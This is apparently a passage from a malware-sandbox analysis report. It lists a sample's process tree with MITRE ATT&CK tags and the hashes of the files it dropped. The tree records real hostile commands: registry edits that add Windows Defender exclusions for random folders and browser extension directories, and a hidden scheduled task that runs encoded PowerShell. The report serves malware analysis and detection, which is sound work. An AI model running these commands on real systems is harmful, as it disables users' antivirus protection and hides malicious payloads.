                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icUnJtTQvkuELQjDIYR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:5940
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icUnJtTQvkuELQjDIYR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:6012
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\EeSlYCOAJoZqeyVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:720
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\EeSlYCOAJoZqeyVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:824
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5284
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:2980
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:2220
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3636
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5848
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:4812
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\cMefWQcQhcMRZPgD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:3296
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\cMefWQcQhcMRZPgD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "gxmokkpNq" /SC once /ST 06:13:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:1876
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /run /I /tn "gxmokkpNq"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:5824
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "gxmokkpNq"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4556
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                PID:5816
                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5268
                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5496
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3076
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:6068
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\InstallDismount.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        PID:4956
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                        werfault.exe /h /shared Global\bf983ab7a3374bd28a4dbb19b1aea4f6 /t 3776 /p 4956
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1156

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Duplicate File Finder 5.4.1.6\duplicateff16.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          18013736431561ee812c52e9b8e224f4

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          4f6ecce6c559c1c60dede5d3c91a7828e454fb58

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          1bbcdcdbf9cdf86d18efe4f902fd1722000dd1f772d5fa2d39861c8257cd635b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          d17e5528481f7f7466745d6b49b182a2792ccbda1408d18a9d42caa71f567969bc31ca81dc5024f0b1faac90f7b909c557803def1884925767ffe14895913470

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Duplicate File Finder 5.4.1.6\sqlite3.dll

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          630KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e477a96c8f2b18d6b5c27bde49c990bf

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e980c9bf41330d1e5bd04556db4646a0210f7409

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Eraser Free 3.1.1.882\eraserfree882.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3.7MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f13406b1311cf3d7fbc7442894045d15

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          a9cbb6c541176bd39adb09491aeb49ea9e54a8fe

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c88985502377b222879e0b51d1f4ec4d0662592a0d234f59b4dcba46c41d3c14

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          6ba3fc07b8858221db6a31ed412d0e93321d34de1792d236787ced0bf0f8d894350217391dd62fe8aea6d389a9b03056ce6827b6e3448c489c31b7acf08c780c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c0636f2d138baca01dbb2eedb99bf3d5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          3b927899db0f3e2cb510782592887dc02fc3e400

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          105KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d3c7a91ce6bb120bc472d385e1c3b9a2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f5fcb8211302e2506cf2c238b1e8e2d8b29bdccd

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          bdd406bfbc081a963756e854eb7a9ee4b487b0e2bf8c11344a2a35bc135b9d2c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ec12df5e66bdd436d4c71b94d3df73d64ca756c05f979c1ef3ab49cca0f351781c1bd8cb01d3924fc2ea099bb2da812e5d30d0084e567f9dd13dffb913c6b207

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f9fd82b572ef4ce41a3d1075acc52d22

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fdded5eef95391be440cc15f84ded0480c0141e3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          aa86d8af24c5665538c45493474e154d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          30ddf600d74e1db41876ea30a23f0b903bb4d806

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c4f6ab1b758691fcc621b26a9909f2556f8a40c0fe19cf99ca7f4e0a259ff5ca

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          e79402ea567e4701edcd68996002f2239abea0353e2798acb3ab78a01829ed23babf5f9e31a7f7d894b0c753dfac165ec7b7a86f83743348c8ac7f6a8e19966f

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ca53cefa89eda1561903f2cec58af742

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          66cc43f787136e1070d79ae51e3fdd4c0ddf6159

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          32e69371ea4fce52c45992bcb31113c9ffb90016e93d0f5f9ec119caa8a8cee9

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a71715ec9c429d3ffb4e59b4e995e6698187ff8cfb5b3096dac9f54f0a87d02cc97ed181cebe55043bee5a75834ad1f893b72d345210459e92efa95404ee70cf

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          16324d67eebfa38055529e9e5f1f9ef0

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d8e94ea2c3d5a7f4e73880055b9247e1014c5c1d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          aec06bcadf691e0d12402f0c8ac092df48f1c2b4b77dae27d10ec618d27f8e95

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ce528cf5233a9f3b40367f45612e7e11eeb89aba427a7b353109fc742681e99c8368e217a0d51f882c31cb6f88cf02dc9e352a01b86863749929d71f78864f66

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0bc31619d25ef1a8721fd7d02beae5f5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          1735df915f2088cd7fd7c538ff429db4fb0e67f7

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f062c7ac63f3a3977d62b6835a5980606e417f14038d27c93807818da34a5b96

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3f266f542c210da4ae788acca9c536229e21026db66894291dfa24be40181deab4187b24a9b0fb8878e4aac6e8dd295b42859722b5eeed3ad1158a3d686cdc17

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnWebGPUCache\data_1

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          264KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b5ac25dfb93a0b018b0777a27a8b2b40

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6d45599154c9e417b0608872b1c8b82d7e80197b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f279dede4a4c917a52cf0e7ac23330fa26ef5ed58e83af9b5cde776f05249237

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4085020b96733d6321c48829a4fc1ebce851e6a9d586f0704fca75d387f9145468ab66a3bdb2fe78c542b4654425b48760ef660fe2d7d63935f1364791102c2b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          69KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          164a788f50529fc93a6077e50675c617

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          3d20584f7f6c8eac79e17cca4207fb79

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          3c16dcc27ae52431c8cdd92fbaab0341524d3092

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          110KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          df82b641dcc6f6776092a5f9aed05cb2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          dfce6068b627807fb8d7cb78c283fd7e818408f0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d5f3b6d70bfaf729dd36050e7c4673a4a00559cd631dd9cc7a1b910868db462a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          91960e7b81a285b7ac7189ed26789547d28303db2fb59aecf00c41641d136acd32c79d1773e2e73cb4d37c38a42a01985b8270c35455a5a64d0789e4f36bec12

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          63ef0d8c88999923e0f1d7fb4260d00f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          84c9147953a9203cd9f56d70463e1bb03e6f65f3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          92198437efe06162a25d64b566d6091e98969bfd53359c3f010adf68470a089d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          71b3abaa3895e9feb380491f5d3aa990ccb28cbce3cab585cb37fa94dbcf37f5fb4169568efe4cb6c3eb08f100ec2425075356d01bfac49be604fc2ae2f023bf

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          936b10623aba7bef3c5008a3c861cc8d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          70a81e8caa1d03da713274ad7b07671450d6130e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          19287112c699ee45c8fe9194beb27c21c0283a902a1dbfbb0bf94cd420b150f6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          87deba4bb6c1d180f789b669178557756496fb32d57014e784d95e028b28e0ae21dda32e21e5b16ac8a7ad057c54c2d77cba1d13c3560772949547e9ddb5e6af

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          111B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6f51a2c7be18e4057009f011ed8001f5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0ffc31fbda64f35efae5cd728c825dd6a978422e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          cf8ff453cc0f969279517b1a23372b505872a28f6c557a652bc2b263d1b0bfc6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          122198b4e9dd28becdb9a0fd30ab1ea0dfa29b36bfa97d977e43e11bb520b601d07948d3fe8a16f26c24decd291fcae21db296be979569b4dc5b09e00072419c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          15KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bf91d4d3b3c0af44d04f5bffbf647248

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          a0526ced3d172e46d2fcd990f76bd38309b372c9

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c830a372fc67909a3324e48f380520465401455832fe48c67ae7e27ff1e6ebef

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          55b9b40c81ee1be7274c261d90fef42dbc34f0cab6a74eef9cdf52dddcad601bc80ee921660305f0a8fae95b6ff2840b6481119b1f300e76ef4d325478062d77

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          15KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0d69db8dde62ccd9dde05c92820b6ddd

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7c32b021712e8c828f6a48391e9667fc604477fc

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          24c8635087c4032b4e555e235d0ade063b4b2888a2cf20503cae3ea7e1cf6e3d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fc0c5003be2fbabc6e863421c7bf80945a5cf944e763e101fac5484bf0d7c75948ffa059ffe8effff14a3e680f3a773a124e7a7d87cebf82a473dfee46a3b91f

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          14KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          61dd651b7c046ba85d48e72d1aecc290

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          85d268e694d3fb40eeb7e37bc1b0573c57e6c37b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          adeb741e752aa132ffc0f882863462db22901edec07ae2068d725383e7431ed0

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2c1b20a6152f04404691ef9443ed0c2417984306e7b7d232b3ccc78e5124df2c2f18accfb39bc6ec66667a89ee14e06bc345ccf846fd76c92276a47ef81a9b7b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          37KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          fbfb38910d7f4b4b67132a720872003c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8f4b8f40b40ce37333cb11d8c6e44f994008022d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          afaabb095c81f32930cbaf148f0cd3a252b492a7bed248549fa22864c2b51004

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          cfd28665473612f4be8ae54b4cb800a8ec177035a282e80f8928230bbc7b17e94d9578e7fa285fbee374cc889d3e61a358ad1c4c78588daf89e83769dac69b98

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a70a8ad0c0b4bff0b3c584b2b9978bf0

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c729d267ee8e6fe5e266bbcd76ed122f061961ad

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5905141f88fe72fdf7e89051fa2c75da8d06f4ca2d45c7dc10af0d14739333ac

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          127cbde19fb447baede666a8a20ca27eea877143236b1919bb8c0dfa72d50d35e241e6e1ce737e065b65cdaecaf8f4df11b8b153f079ae1a5263b7db7be35719

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          872B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          136f379fa93d1fe5e33ca0cb287cdd15

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d5262a885867e1f2e1b54f3ad6f7e7aeda3c158a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          26ffe8cd8ee9ac71278cf95b29596d0038b49f99a448b6e72a5d326aa4c6e47e

                                                                                                                                                                                                                          SHA512

